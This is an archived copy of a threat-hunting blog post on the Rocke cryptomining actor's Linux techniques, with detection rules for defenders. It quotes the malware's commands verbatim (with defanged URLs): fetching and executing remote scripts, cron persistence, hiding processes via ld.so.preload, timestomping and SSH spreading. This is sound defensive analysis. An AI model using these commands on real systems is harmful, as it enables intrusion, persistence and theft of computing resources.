{ "id": "5f8fbd96-bd47-42bc-8e1c-3734c007e0bc", "created_at": "2026-04-06T00:17:32.690025Z", "updated_at": "2026-04-10T13:11:55.483118Z", "deleted_at": null, "sha1_hash": "238a0dc2d7c417664d146b73a4ade9718a20edbe", "title": "Threat Hunting in Linux For Rocke Cryptocurrency Mining Malware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 91603, "plain_text": "Threat Hunting in Linux For Rocke Cryptocurrency Mining\r\nMalware\r\nBy Brian Donohue\r\nArchived: 2026-04-05 19:13:33 UTC\r\nIn this post, we’ll cover a threat actor named Rocke (also known as Iron) and some of the techniques the actor\r\nuses to compromise Linux systems. Palo Alto Networks’ Unit 42 and Cisco Talos Group have each published\r\nresearch examining Rocke campaigns, noting that the adversary’s activity dates back at least as far as April 2018.\r\nRocke has primarily been associated with cryptocurrency mining payloads and the Xbash malware family.\r\nHowever, in recent campaigns, notably those examined by Talos Group and Unit 42 in August 2018 and January\r\n2019 respectively, the adversary has combined its cryptocurrency mining payloads with a script to establish\r\npersistence and uninstall security software that may prevent it from executing.\r\nWe’re going to focus on tactics, techniques, and procedures (TTPs) from this recent campaign and recommend\r\nsome hunts that will help you uncover Rocke-related activity in your environment using endpoint data.\r\nRemote Code Execution in Public-Facing Apps (T1190)\r\nPublished research by Unit 42 and Talos Group indicates that Rocke has exploited remote code execution (RCE)\r\nvulnerabilities in Oracle Weblogic, Apache Struts, Adobe ColdFusion, phpMyAdmin, Redis, and other public-facing services. It’s ideal but difficult to detect Rocke in near-real-time as the adversary attempts to execute code.\r\nDepending on the configuration of web applications in your organization, legitimate command shells may appear\r\nvery similarly to web shells and RCE vulnerabilities when examined via endpoint detection and response (EDR)\r\ntelemetry. Since Rocke exploits a diverse array of services, it may be more effective to approach detection from a\r\nreporting perspective rather than an alerting perspective. By leveraging this method, you can review endpoint data\r\nperiodically to see which processes have spawned from PHP, Java, or other processes associated with the services\r\nthat Rocke is thought to exploit.\r\nExecution \u0026 Discovery\r\nDownloading and Deobfuscating Code (T1140)\r\nWhen Rocke achieves code execution on an endpoint, the actor proceeds to use the curl or wget utilities to\r\ndownload payloads to execute with a bash shell. The downloaded payloads are hosted using Pastebin, a popular\r\nonline code repository.\r\n(curl -fsSL hxxps://pastebin[.]com/raw/sF3gViaw || wget -q -O-hxxps://pastebin[.]com/raw/sF3gViaw)|base64 -d |/bin/bash\r\nhttps://redcanary.com/blog/rocke-cryptominer/\r\nPage 1 of 6\n\nThe above command is a first stage script that delivers further payloads to a host. It uses the curl or wget\r\ncommand—depending on which is present on the host—then uses the base64 utility to deobfuscate the\r\ndownloaded code and execute that result using the bash command shell. The second stage delivered is quite\r\nlengthy, and we’ll collapse it to only the relevant portions for detection here.\r\nStopping Competing Miners\r\nThe first part of the second stage script delivered by Rocke attempts to stop other cryptocurrency miner processes\r\nwith commands such as:\r\npkill -f xmrig\r\npkill -f Loopback\r\npkill -f apaceha\r\npkill -f cryptonight\r\npkill -f stratum\r\npkill -f minerd\r\nThese commands eliminate potential competition for resources on an infected system, but they also present a\r\npotentially high-fidelity alert for defenders. Most environments do not commonly execute these pkill\r\ncommands with command line options including miner names.\r\nDiscovering Competing Miners Using Network Connections (T1049)\r\nAfter these process stopping commands, Rocke conducts additional reconnaissance to determine if unknown\r\nminers are executing on the system using the netstat command. By stringing the output of netstat together\r\nwith text searches, the actor searches for additional processes to stop:\r\nnetstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9\r\nnetstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9\r\nnetstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9\r\nSystem administrators may commonly use the netstat command, but most operational environments probably\r\ndon’t often use grep commands to search for the strings :3333 , :4444 , or :5555 . These grep commands\r\n—along with the pkill commands above—present an interesting phenomenon: they are common fixtures\r\namong cryptocurrency miner script payloads for Linux in general that are not exclusive to Rocke. For research on\r\nyour own, you can perform a quick Google search to verify this using the following terms:\r\n\"pkill\" \"xmrig\" site:pastebin.com\r\nWhile traditional command line logging is rarely implemented on most Linux systems, EDR solutions or other\r\naudit technologies that keep this information allow a focused detection approach, even into historical records.\r\nMiner Payload Execution and Masquerading (T1036)\r\nOnce the path has been cleared of other miners, Rocke then deploys its mining payload.\r\nhttps://redcanary.com/blog/rocke-cryptominer/\r\nPage 2 of 6\n\n(curl -fsSL --connect-timeout 120 hxxps://master[.]minerxmr[.]ru/One/c -o /var/tmp/config.json||wget\r\nhxxps://master[.]minerxmr[.]ru/One/c -O /var/tmp/config.json) \u0026\u0026 chmod +x /var/tmp/config.json\r\n(curl -fsSL --connect-timeout 120 hxxps://master[.]minerxmr[.]ru/One/x1 -o /var/tmp/kworkerds||wget\r\nhxxps://master[.]minerxmr[.]ru/One/x1 -O /var/tmp/kworkerds) \u0026\u0026 chmod +x /var/tmp/kworkerds\r\nnohup /var/tmp/kworkerds \u003e/dev/null 2\u003e\u00261 \u0026\r\nAs with previous payload deliveries, the miner itself is downloaded using curl or wget . First, a config.json\r\nfile containing miner configuration data is written to the /tmp folder followed shortly after by a miner binary\r\nitself named kworkerds . The miner is executed using the nohup command, discarding the output and allowing\r\nthe binary to execute in the background with a trailing ampersand ( \u0026 ) in the command line.\r\nExecution in this manner is a form of masquerading, as the binary is named partially after a Linux kernel worker\r\nthread. Linux systems will execute processes named kworker all the time, but the processes will not use a binary\r\nin a /tmp folder. This becomes a high fidelity behavior to use for alerts.\r\nPersisting with Cron Jobs (T1168)\r\nRocke uses cron jobs to persist on victim systems. Cron is a *NIX technology analogous to (and long predating)\r\nScheduled Tasks in Windows. It gives system administrators the ability to execute commands on a schedule\r\nwithout the need to be logged in to a system. It also allows them the ability to schedule commands to execute as\r\nnon-administrator users on a system. When adversaries manipulate cron jobs, they usually do so in one of two\r\nways:\r\n1. Replacing the cron schedule, known as a crontab, with their own\r\n2. Placing a malicious script in a folder known to contain scripts that will execute hourly, daily, or weekly as\r\npart of existing cron jobs\r\nIn this case, Rocke uses both options. They placed malicious scripts into folders known to execute during cron\r\njobs. This is achieved by using curl or wget , depending on system support, to download a bash shell script\r\nand write it into numerous folders:\r\n/etc/cron.hourly/oanacroner\r\n/etc/cron.daily/oanacroner\r\n/etc/cron.monthly/oanacroner\r\n(curl -fsSL --connect-timeout 120 hxxps://pastebin[.]com/raw/1NtRkBc3 -o\r\n/etc/cron.hourly/oanacroner||wget hxxps://pastebin[.]com/raw/1NtRkBc3 -O /etc/cron.hourly/oanacroner)\r\nDepending on the configuration of a Linux system, crontab schedules may exist in numerous locations for\r\nmultiple users. Rocke takes advantage of this to modify crontabs in these locations:\r\n/etc/cron.d/root\r\n/etc/cron.d/apache\r\n/var/spool/cron/root\r\nhttps://redcanary.com/blog/rocke-cryptominer/\r\nPage 3 of 6\n\n/var/spool/cron/crontabs/root\r\necho -e \"*/10 * * * * root (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O-hxxps://pastebin[.]com/raw/1NtRkBc3)|sh\\n##\" \u003e /etc/cron.d/root\r\nTo modify these schedules, Rocke directly modifies the files by echoing content into them as shown above. This\r\nmethod of editing crontab schedules is used by other adversaries, and we’ve also found other adversaries use the\r\ncrontab system utility to replace schedules in a different fashion. The echo method is harder to observe using\r\nEDR data as echo is an internal shell command rather than a utility.\r\nDefense Evasion\r\nHiding Processes with Process Injection (T1055)\r\nRocke uses a novel method to hide the execution of kworkerds from casual observation. The adversary uses a\r\nmodified version of the libprocesshider project compiled as a shared object, the Linux equivalent of a Windows\r\nDynamic-Link Library (DLL). To execute the code Rocke modifies /etc/ld.so.preload , a configuration file\r\nthat will inject listed shared objects into executing processes on a Linux system.\r\necho /usr/local/lib/libntpd.so \u003e /etc/ld.so.preload\r\nThis will prevent processes such as the ps utility from observing kworkerds , but it will not prevent security\r\nsoftware that monitors syscalls from observing the malicious process. Trend Micro showed the effects of this\r\ntechnique in a blog post.\r\nThe ld.so.preload configuration file isn’t modified very often outside certain software packages. This can be a\r\nmedium confidence alert once it’s been tuned for a given environment, with much higher confidence when\r\ncombined with other means of detection previously addressed.\r\nChanging Timestamps (T1099)\r\nThis adversary uses the touch command to manipulate timestamps on victim systems in a process known as\r\n“timestomping.” This technique hinders filesystem forensic analysis to determine what files were modified around\r\nthe time of illicit activity. To modify timestamps, numerous commands similar to this are issued:\r\ntouch -acmr /bin/sh /etc/cron.hourly/oanacroner\r\nThis command allows Rocke to change the access and modification timestamps (as indicated by the a and m\r\nflags) of /etc/cron.hourly/oanacroner without creating the file if it doesn’t already exist (via the c flag). The\r\nmodification of timestamps with touch usually uses the current system time unless told otherwise. In this case,\r\nRocke uses touch with the r command flag to specify a reference file of /bin/sh . This allows touch to copy\r\ntimestamps from /bin/sh and apply them to the specified script file left by the adversary. This action blends the\r\ntimestamps of numerous malicious files in with the timestamps of files changed during updates and installations.\r\nLateral Movement with SSH (T1021)\r\nhttps://redcanary.com/blog/rocke-cryptominer/\r\nPage 4 of 6\n\nAdversaries deploying cryptocurrency miners on Windows commonly use built-in services to move laterally, and\r\nthe same is true of Linux systems in this case. Rocke looks for the presence of SSH public key configuration and a\r\nlist of known local hosts on a Linux server to move laterally. If these materials are present, the adversary issues\r\ncommands using the ssh utility such as these, where $h is a variable in the script for discovered hosts:\r\nssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL\r\nhxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh'\r\nIf it successfully connects to any other system, the same sequence of events described in the rest of the article\r\nhappens on connected systems. This behavior can lead to a medium confidence alert once some tuning brings\r\nsystem administration and software deployment noise down.\r\nBehavioral Indicators of Compromise\r\nDetecting Stops of Miner Processes\r\nHigh Confidence\r\nProcess is pkill AND\r\nCommand line contains stratum , minerd , xmr , OR cryptonight\r\nRecon of Miner Network Connections\r\nMedium Confidence, tune out JAMF configuration management if needed\r\nProcess is grep AND\r\nCommand line contains :3333 , :4444 , OR :5555\r\nDownloading from Pastebin\r\nHigh Confidence\r\nProcess is curl OR wget AND\r\nCommand line contains pastebin.com\r\nDownloading Binary to Temporary Folders\r\nMedium Confidence, tune out configuration management systems\r\nProcess is curl OR wget AND\r\nWrites ELF binary to /tmp/ , /var/tmp , OR /dev/shm\r\nTimestamp Manipulation\r\nHigh Confidence, fragile due to ability to change command line flags\r\nProcess is touch AND\r\nCommand line contains -acmr\r\nCode Injection Using Preload\r\nMedium confidence, tune out system monitoring and backup systems\r\nFile modified is /etc/ld.so.preload\r\nLateral Movement Using SSH\r\nMedium confidence, tune out software deployment\r\nhttps://redcanary.com/blog/rocke-cryptominer/\r\nPage 5 of 6\n\nProcess is ssh AND\r\nCommand line contains curl , wget , AND |sh\r\nConclusion\r\nThe tools and techniques used by Rocke to compromise Linux systems exhibit clear-cut, malicious behavior, and\r\nyou can definitely use the behaviors to detect this actor in your environment. Approaching with the recommended\r\nsteps will help you build detection capabilities for your Linux endpoints that will mirror coverage you have for the\r\nWindows portion of your network.\r\nSource: https://redcanary.com/blog/rocke-cryptominer/\r\nhttps://redcanary.com/blog/rocke-cryptominer/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://redcanary.com/blog/rocke-cryptominer/" ], "report_names": [ "rocke-cryptominer" ], "threat_actors": [ { "id": "7c053836-8f50-4d40-bc5c-7088967e1b57", "created_at": "2022-10-25T16:07:24.549525Z", "updated_at": "2026-04-10T02:00:05.03048Z", "deleted_at": null, "main_name": "Rocke", "aliases": [ "Aged Libra", "G0106", "Iron Group", "Rocke" ], "source_name": "ETDA:Rocke", "tools": [ "Godlua", "Kerberods", "LSD", "Pro-Ocean", "Xbash" ], "source_id": "ETDA", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "905eabd9-2b7f-483d-86bd-0c72f96b4162", "created_at": "2023-01-06T13:46:39.02749Z", "updated_at": "2026-04-10T02:00:03.185957Z", "deleted_at": null, "main_name": "Rocke", "aliases": [ "Aged Libra" ], "source_name": "MISPGALAXY:Rocke", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "0b02af5f-2027-42b7-a6f2-51e2fd49ba7f", "created_at": "2022-10-25T15:50:23.360509Z", "updated_at": "2026-04-10T02:00:05.337702Z", "deleted_at": null, "main_name": "Rocke", "aliases": [ "Rocke" ], "source_name": "MITRE:Rocke", "tools": null, "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434652, "ts_updated_at": 1775826715, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/238a0dc2d7c417664d146b73a4ade9718a20edbe.pdf", "text": "https://archive.orkl.eu/238a0dc2d7c417664d146b73a4ade9718a20edbe.txt", "img": "https://archive.orkl.eu/238a0dc2d7c417664d146b73a4ade9718a20edbe.jpg" } }